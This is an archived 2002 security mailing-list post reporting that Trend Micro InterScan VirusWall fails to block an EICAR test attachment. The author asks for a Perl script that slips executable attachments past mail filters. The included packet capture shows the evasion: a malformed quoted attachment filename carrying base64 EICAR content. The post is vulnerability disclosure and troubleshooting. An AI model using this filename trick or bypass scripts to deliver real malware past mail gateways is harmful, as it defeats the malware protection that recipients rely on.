bypassing attachments

From: Onie Camara (neil@restricted.dyndns.org)
Date: 02/23/02


From: "Onie Camara" <neil@restricted.dyndns.org>
To: <incidents@securityfocus.com>
Date: Sat, 23 Feb 2002 11:37:29 -0600

Hi guys,

I don't know where to post actually.

I am very interested in security and would like some of your help.

I have found, I hope, a vulnerability in Trend Micro interscan viruswall.
I have a setup of qmail and sqwebmail running on freebsd. When I send an
email from sqwebmail containing
the eicar test virus attachment, the attachment is bypassed by Interscan and
is successfully delivered .

I have escalated this to Trend Micro since the early week of January and
until now, even with the latest pattern
file, it is still bypassed.

This is somewhat related to the Feb 18 post at
http://www.securiteam.com/securitynews/5DP0I206AY.html

Now, since I will be doing a pentest for another company, I would like some
help on where I can download
a perl script that will send an exe,com attachment to a mail server but will
bypass the filtering gateway.

I have used this script, http://www.securiteam.com/exploits/5ZP0D2K6AY.html
It works but
the extension's attachment changes. Ex. eicar.com will become eicar._com

Here is a tcpdump:

bash# tcpdump -x -X -s 14400 port not 22 and port not 53 and not arp and
port not 68 and port not 67 and port not 80 and not igmp
tcpdump: listening on xl0
11:23:45.478174 65.192.117.68.1760 > dhcp-74-1628.smtp: S
2796302688:2796302688(0) win 16384 <mss 1460,nop,nop,sackOK,nop,wscale
0,nop,nop,timestamp 546622090 0> (DF)
0x0000 4500 0040 66b1 4000 3406 1f70 41c0 7544 E..@f.@.4..pA.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 3160 0000 0000 ..........1`....
0x0020 b002 4000 6b45 0000 0204 05b4 0101 0402 ..@.kE..........
0x0030 0103 0300 0101 080a 2094 ca8a 0000 0000 ................
11:23:45.478679 dhcp-74-1628.smtp > 65.192.117.68.1760: S
1437153606:1437153606(0) ack 2796302689 win 33304 <mss 1460,nop,wscale
0,nop,nop,timestamp 908042 546622090> (DF)
0x0000 4500 003c 0f7c 4000 4006 6aa9 0cf8 fc9a E..<.|@.@.j.....
0x0010 41c0 7544 0019 06e0 55a9 3946 a6ac 3161 A.uD....U.9F..1a
0x0020 a012 8218 d41b 0000 0204 05b4 0103 0300 ................
0x0030 0101 080a 000d db0a 2094 ca8a ............
11:23:45.494674 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 1 win 17376
<nop,nop,timestamp 546622090 908042> (DF)
0x0000 4500 0034 42c4 4000 3406 4369 41c0 7544 E..4B.@.4.CiA.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3947 ..........1aU.9G
0x0020 8010 43e0 3e18 0000 0101 080a 2094 ca8a ..C.>...........
0x0030 000d db0a ....
11:23:45.530047 dhcp-74-1628.smtp > 65.192.117.68.1760: P 1:43(42) ack 1 win
33304 <nop,nop,timestamp 908048 546622090> (DF)
0x0000 4500 005e 7e6d 4000 4006 fb95 0cf8 fc9a E..^~m@.@.......
0x0010 41c0 7544 0019 06e0 55a9 3947 a6ac 3161 A.uD....U.9G..1a
0x0020 8018 8218 e931 0000 0101 080a 000d db10 .....1..........
0x0030 2094 ca8a 3232 3020 7072 6f6d 6973 6375 ....220.promiscu
0x0040 6f75 732e 6479 6e64 6e73 2e6f 7267 2045 ous.dyndns.org.E
0x0050 534d 5450 2050 6f73 7466 6978 0d0a SMTP.Postfix..
11:23:45.553735 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 43 win 17376
<nop,nop,timestamp 546622090 908048> (DF)
0x0000 4500 0034 2223 4000 3406 640a 41c0 7544 E..4"#@.4.d.A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971 ..........1aU.9q
0x0020 8010 43e0 3de8 0000 0101 080a 2094 ca8a ..C.=...........
0x0030 000d db10 ....
11:23:45.553933 65.192.117.68.1760 > dhcp-74-1628.smtp: P 1:33(32) ack 43
win 17376 <nop,nop,timestamp 546622090 908048> (DF)
0x0000 4500 0054 5ac7 4000 3406 2b46 41c0 7544 E..TZ.@.4.+FA.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971 ..........1aU.9q
0x0020 8018 43e0 85fe 0000 0101 080a 2094 ca8a ..C.............
0x0030 000d db10 4548 4c4f 2061 6e74 6973 7061 ....EHLO.antispa
0x0040 6d2e 7265 6d69 6e67 746f 6e6c 7464 2e63 m.remingtonltd.c
0x0050 6f6d 0d0a om..
11:23:45.554671 dhcp-74-1628.smtp > 65.192.117.68.1760: P 43:151(108) ack 33
win 33304 <nop,nop,timestamp 908050 546622090> (DF)
0x0000 4500 00a0 b62a 4000 4006 c396 0cf8 fc9a E....*@.@.......
0x0010 41c0 7544 0019 06e0 55a9 3971 a6ac 3181 A.uD....U.9q..1.
0x0020 8018 8218 5f91 0000 0101 080a 000d db12 ...._...........
0x0030 2094 ca8a 3235 302d 7072 6f6d 6973 6375 ....250-promiscu
0x0040 6f75 732e 6479 6e64 6e73 2e6f 7267 0d0a ous.dyndns.org..
0x0050 3235 302d 5049 5045 4c49 4e49 4e47 0d0a 250-PIPELINING..
0x0060 3235 302d 5349 5a45 2032 3030 3030 3030 250-SIZE.2000000
0x0070 300d 0a32 3530 2d56 5246 590d 0a32 3530 0..250-VRFY..250
0x0080 2d45 5452 4e0d 0a32 3530 2d58 5645 5250 -ETRN..250-XVERP
0x0090 0d0a 3235 3020 3842 4954 4d49 4d45 0d0a ..250.8BITMIME..
11:23:45.571627 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 151 win 17268
<nop,nop,timestamp 546622090 908050> (DF)
0x0000 4500 0034 0598 4000 3406 8095 41c0 7544 E..4..@.4...A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd ..........1.U.9.
0x0020 8010 4374 3dc6 0000 0101 080a 2094 ca8a ..Ct=...........
0x0030 000d db12 ....
11:23:45.573727 65.192.117.68.1760 > dhcp-74-1628.smtp: P 33:101(68) ack 151
win 17376 <nop,nop,timestamp 546622090 908050> (DF)
0x0000 4500 0078 01ee 4000 3406 83fb 41c0 7544 E..x..@.4...A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd ..........1.U.9.
0x0020 8018 43e0 4202 0000 0101 080a 2094 ca8a ..C.B...........
0x0030 000d db12 4d41 494c 2046 524f 4d3a 3c3e ....MAIL.FROM:<>
0x0040 2053 495a 453d 3131 3139 0d0a 5243 5054 .SIZE=1119..RCPT
0x0050 2054 4f3a 3c6e 6569 6c40 7265 7374 7269 .TO:<neil@restri
0x0060 6374 6564 2e64 796e 646e 732e 6f72 673e cted.dyndns.org>
0x0070 0d0a 4441 5441 0d0a ..DATA..
11:23:45.580592 dhcp-74-1628.smtp > 65.192.117.68.1760: P 151:204(53) ack
101 win 33304 <nop,nop,timestamp 908053 546622090> (DF)
0x0000 4500 0069 6a03 4000 4006 0ff5 0cf8 fc9a E..ij.@.@.......
0x0010 41c0 7544 0019 06e0 55a9 39dd a6ac 31c5 A.uD....U.9...1.
0x0020 8018 8218 502b 0000 0101 080a 000d db15 ....P+..........
0x0030 2094 ca8a 3235 3020 4f6b 0d0a 3235 3020 ....250.Ok..250.
0x0040 4f6b 0d0a 3335 3420 456e 6420 6461 7461 Ok..354.End.data
0x0050 2077 6974 6820 3c43 523e 3c4c 463e 2e3c .with.<CR><LF>.<
0x0060 4352 3e3c 4c46 3e0d 0a CR><LF>..
11:23:45.607780 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 204 win 17323
<nop,nop,timestamp 546622090 908053> (DF)
0x0000 4500 0034 2d7e 4000 3406 58af 41c0 7544 E..4-~@.4.X.A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12 ..........1.U.:.
0x0020 8010 43ab 3d13 0000 0101 080a 2094 ca8a ..C.=...........
0x0030 000d db15 ....
11:23:45.615561 65.192.117.68.1760 > dhcp-74-1628.smtp: P 101:1229(1128) ack
204 win 17376 <nop,nop,timestamp 546622090 908053> (DF)
0x0000 4500 049c 4e19 4000 3406 33ac 41c0 7544 E...N.@.4.3.A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12 ..........1.U.:.
0x0020 8018 43e0 715b 0000 0101 080a 2094 ca8a ..C.q[..........
0x0030 000d db15 5265 6365 6976 6564 3a20 6672 ....Received:.fr
0x0040 6f6d 2079 6f75 2028 6c6f 6361 6c68 6f73 om.you.(localhos
0x0050 7420 5b31 3237 2e30 2e30 2e31 5d29 0d0a t.[127.0.0.1])..
0x0060 0962 7920 616e 7469 7370 616d 2e72 656d .by.antispam.rem
0x0070 696e 6774 6f6e 6c74 642e 636f 6d20 2850 ingtonltd.com.(P
0x0080 6f73 7466 6978 2920 7769 7468 2053 4d54 ostfix).with.SMT
0x0090 5020 6964 2036 3730 4237 4538 4434 0d0a P.id.670B7E8D4..
0x00a0 0966 6f72 203c 6e65 696c 4072 6573 7472 .for.<neil@restr
0x00b0 6963 7465 642e 6479 6e64 6e73 2e6f 7267 icted.dyndns.org
0x00c0 3e3b 2053 6174 2c20 3233 2046 6562 2032 >;.Sat,.23.Feb.2
0x00d0 3030 3220 3131 3a31 363a 3137 202d 3036 002.11:16:17.-06
0x00e0 3030 2028 4353 5429 0d0a 4672 6f6d 3a20 00.(CST)..From:.
0x00f0 736f 6d65 4072 656d 696e 6774 6f6e 6c74 some@remingtonlt
0x0100 642e 636f 6d0d 0a54 6f3a 206e 6569 6c40 d.com..To:.neil@
0x0110 7265 7374 7269 6374 6564 2e64 796e 646e restricted.dyndn
0x0120 732e 6f72 670d 0a53 7562 6a65 6374 3a20 s.org..Subject:.
0x0130 7465 7374 0d0a 4d49 4d45 2d56 6572 7369 test..MIME-Versi
0x0140 6f6e 3a20 312e 300d 0a43 6f6e 7465 6e74 on:.1.0..Content
0x0150 2d54 7970 653a 206d 756c 7469 7061 7274 -Type:.multipart
0x0160 2f72 656c 6174 6564 3b0d 0a20 2020 2020 /related;.......
0x0170 2020 2074 7970 653d 226d 756c 7469 7061 ...type="multipa
0x0180 7274 2f61 6c74 6572 6e61 7469 7665 223b rt/alternative";
0x0190 0d0a 2020 2020 2020 2020 626f 756e 6461 ..........bounda
0x01a0 7279 3d22 4e65 7874 5061 7274 3139 220d ry="NextPart19".
0x01b0 0a4d 6573 7361 6765 2d49 643a 203c 3230 .Message-Id:.<20
0x01c0 3032 3032 3233 3137 3136 3137 2e36 3730 020223171617.670
0x01d0 4237 4538 4434 4061 6e74 6973 7061 6d2e B7E8D4@antispam.
0x01e0 7265 6d69 6e67 746f 6e6c 7464 2e63 6f6d remingtonltd.com
0x01f0 3e0d 0a44 6174 653a 2053 6174 2c20 3233 >..Date:.Sat,.23
0x0200 2046 6562 2032 3030 3220 3131 3a31 363a .Feb.2002.11:16:
0x0210 3137 202d 3036 3030 2028 4353 5429 0d0a 17.-0600.(CST)..
0x0220 0d0a 5468 6973 2069 7320 6120 6d75 6c74 ..This.is.a.mult
0x0230 692d 7061 7274 206d 6573 7361 6765 2069 i-part.message.i
0x0240 6e20 4d49 4d45 2066 6f72 6d61 742e 0d0a n.MIME.format...
0x0250 0d0a 2d2d 4e65 7874 5061 7274 3139 0d0a ..--NextPart19..
0x0260 436f 6e74 656e 742d 5479 7065 3a20 6d75 Content-Type:.mu
0x0270 6c74 6970 6172 742f 616c 7465 726e 6174 ltipart/alternat
0x0280 6976 653b 0d0a 2020 2020 2020 2020 626f ive;..........bo
0x0290 756e 6461 7279 3d22 4e65 7874 5061 7274 undary="NextPart
0x02a0 3230 220d 0a0d 0a2d 2d4e 6578 7450 6172 20"....--NextPar
0x02b0 7432 300d 0a43 6f6e 7465 6e74 2d54 7970 t20..Content-Typ
0x02c0 653a 2074 6578 742f 706c 6169 6e0d 0a43 e:.text/plain..C
0x02d0 6f6e 7465 6e74 2d54 7261 6e73 6665 722d ontent-Transfer-
0x02e0 456e 636f 6469 6e67 3a20 7175 6f74 6564 Encoding:.quoted
0x02f0 2d70 7269 6e74 6162 6c65 0d0a 0d0a 2d2d -printable....--
0x0300 4e65 7874 5061 7274 3230 0d0a 436f 6e74 NextPart20..Cont
0x0310 656e 742d 5479 7065 3a20 7465 7874 2f68 ent-Type:.text/h
0x0320 746d 6c3b 0d0a 2020 2020 2020 2020 6368 tml;..........ch
0x0330 6172 7365 743d 2269 736f 2d38 3835 392d arset="iso-8859-
0x0340 3122 0d0a 436f 6e74 656e 742d 5472 616e 1"..Content-Tran
0x0350 7366 6572 2d45 6e63 6f64 696e 673a 2071 sfer-Encoding:.q
0x0360 756f 7465 642d 7072 696e 7461 626c 650d uoted-printable.
0x0370 0a0d 0a74 6573 740d 0a2d 2d4e 6578 7450 ...test..--NextP
0x0380 6172 7432 302d 2d0d 0a0d 0a2d 2d4e 6578 art20--....--Nex
0x0390 7450 6172 7431 390d 0a43 6f6e 7465 6e74 tPart19..Content
0x03a0 2d54 7970 653a 2061 7070 6c69 6361 7469 -Type:.applicati
0x03b0 6f6e 2f78 2d6d 7364 6f77 6e6c 6f61 640d on/x-msdownload.
0x03c0 0a43 6f6e 7465 6e74 2d44 6973 706f 7369 .Content-Disposi
0x03d0 7469 6f6e 3a20 6174 7461 6368 6d65 6e74 tion:.attachment
0x03e0 3b66 696c 656e 616d 653d 2265 6963 6172 ;filename="eicar
0x03f0 2e22 636f 6d22 0d0a 436f 6e74 656e 742d ."com"..Content-
0x0400 5472 616e 7366 6572 2d45 6e63 6f64 696e Transfer-Encodin
0x0410 673a 2062 6173 6536 340d 0a0d 0a57 4456 g:.base64....WDV
0x0420 5049 5641 6c51 4546 5157 7a52 6355 4670 PIVAlQEFQWzRcUFp
0x0430 594e 5451 6f55 4634 704e 304e 444b 5464 YNTQoUF4pN0NDKTd
0x0440 394a 4556 4a51 3046 534c 564e 5551 5535 9JEVJQ0FSLVNUQU5
0x0450 4551 564a 454c 5546 4f56 456c 5753 564a EQVJELUFOVElWSVJ
0x0460 5655 7931 5552 564e 550d 0a4c 555a 4a54 VUy1URVNU..LUZJT
0x0470 4555 684a 4567 7253 436f 4e43 673d 3d0d EUhJEgrSCoNCg==.
0x0480 0a0d 0a2d 2d4e 6578 7450 6172 7431 392d ...--NextPart19-
0x0490 2d0d 0a2e 0d0a 5155 4954 0d0a -.....QUIT..
11:23:45.709692 dhcp-74-1628.smtp > 65.192.117.68.1760: . ack 1229 win 33304
<nop,nop,timestamp 908066 546622090> (DF)
0x0000 4500 0034 cc50 4000 4006 addc 0cf8 fc9a E..4.P@.@.......
0x0010 41c0 7544 0019 06e0 55a9 3a12 a6ac 362d A.uD....U.:...6-
0x0020 8010 8218 fa30 0000 0101 080a 000d db22 .....0........."
0x0030 2094 ca8a ....
11:23:47.074647 dhcp-74-1628.smtp > 65.192.117.68.1760: P 204:243(39) ack
1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
0x0000 4500 005b 9c6c 4000 4006 dd99 0cf8 fc9a E..[.l@.@.......
0x0010 41c0 7544 0019 06e0 55a9 3a12 a6ac 362d A.uD....U.:...6-
0x0020 8018 8218 00bc 0000 0101 080a 000d dbaa ................
0x0030 2094 ca8a 3235 3020 4f6b 3a20 7175 6575 ....250.Ok:.queu
0x0040 6564 2061 7320 3843 4237 3635 3334 3745 ed.as.8CB765347E
0x0050 0d0a 3232 3120 4279 650d 0a ..221.Bye..
11:23:47.074908 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
0x0000 4500 0034 fa45 4000 4006 7fe7 0cf8 fc9a E..4.E@.@.......
0x0010 41c0 7544 0019 06e0 55a9 3a39 a6ac 362d A.uD....U.:9..6-
0x0020 8011 8218 f980 0000 0101 080a 000d dbaa ................
0x0030 2094 ca8a ....
11:23:47.091722 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 243 win 17376
<nop,nop,timestamp 546622093 908202> (DF)
0x0000 4500 0034 4a13 4000 3406 3c1a 41c0 7544 E..4J.@.4.<.A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39 ..........6-U.:9
0x0020 8010 43e0 37b7 0000 0101 080a 2094 ca8d ..C.7...........
0x0030 000d dbaa ....
11:23:47.092205 65.192.117.68.1760 > dhcp-74-1628.smtp: F 1229:1229(0) ack
243 win 17376 <nop,nop,timestamp 546622093 908202> (DF)
0x0000 4500 0034 4ca3 4000 3406 398a 41c0 7544 E..4L.@.4.9.A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39 ..........6-U.:9
0x0020 8011 43e0 37b6 0000 0101 080a 2094 ca8d ..C.7...........
0x0030 000d dbaa ....
11:23:47.092519 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
1230 win 33304 <nop,nop,timestamp 908204 546622093> (DF)
0x0000 4500 0034 f518 4000 4006 8514 0cf8 fc9a E..4..@.@.......
0x0010 41c0 7544 0019 06e0 55a9 3a39 a6ac 362e A.uD....U.:9..6.
0x0020 8011 8218 f97a 0000 0101 080a 000d dbac .....z..........
0x0030 2094 ca8d ....
11:23:47.097243 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
<nop,nop,timestamp 546622093 908202> (DF)
0x0000 4500 0034 5a93 4000 3406 2b9a 41c0 7544 E..4Z.@.4.+.A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a ..........6.U.::
0x0020 8010 43e0 37b5 0000 0101 080a 2094 ca8d ..C.7...........
0x0030 000d dbaa ....
11:23:47.109155 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
<nop,nop,timestamp 546622093 908204> (DF)
0x0000 4500 0034 3e09 4000 3406 4824 41c0 7544 E..4>.@.4.H$A.uD
0x0010 0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a ..........6.U.::
0x0020 8010 43e0 37b3 0000 0101 080a 2094 ca8d ..C.7...........
0x0030 000d dbac ....
^C



Relevant Pages

  • Re: bypassing attachments
    ... OC> I have found, I hope, a vulnerability in Trend Micro interscan viruswall. ... OC> a perl script that will send an exe,com attachment to a mail server but will ... OC> port not 68 and port not 67 and port not 80 and not igmp ... OC> tcpdump: listening on xl0 ...
    (Vuln-Dev)
  • summary: solaris network port response time
    ... Andrew suggested port mapping and scapy.py, ... John Hallman suggested IO::Socket module using Perl script, ... Ddelija also suggested switch port mapping, which I can9t implement in our ...
    (SunManagers)
  • Re: isc-dhcp-server not receiving DHCPDISCOVER
    ... Wireshark is good for interpreting the contents of the packets. ... The biggest thing about tcpdump is that there will almost always be ... Sometimes lots of noise. ... "not port foo" ignores that port. ...
    (Debian-User)
  • Problem with Nat (port forwarding)
    ... PPPoE Configuration for DSL ... nat# cat /etc/ppp/ppp.conf ... In addition rule number 00301 triggers appropriately when a packet destined for port 5000 is inbound. ... TCPDUMP from destination machine ...
    (freebsd-questions)
  • Re: EAGAIN mystery on accept()
    ... Thanks a real lot Michael for reading my mail. ... lsof showed this to be the only process with a socket on this port ... > In an earlier post you said that tcpdump showed no incoming packets. ... > interface that you're not sniffing, ...
    (comp.unix.solaris)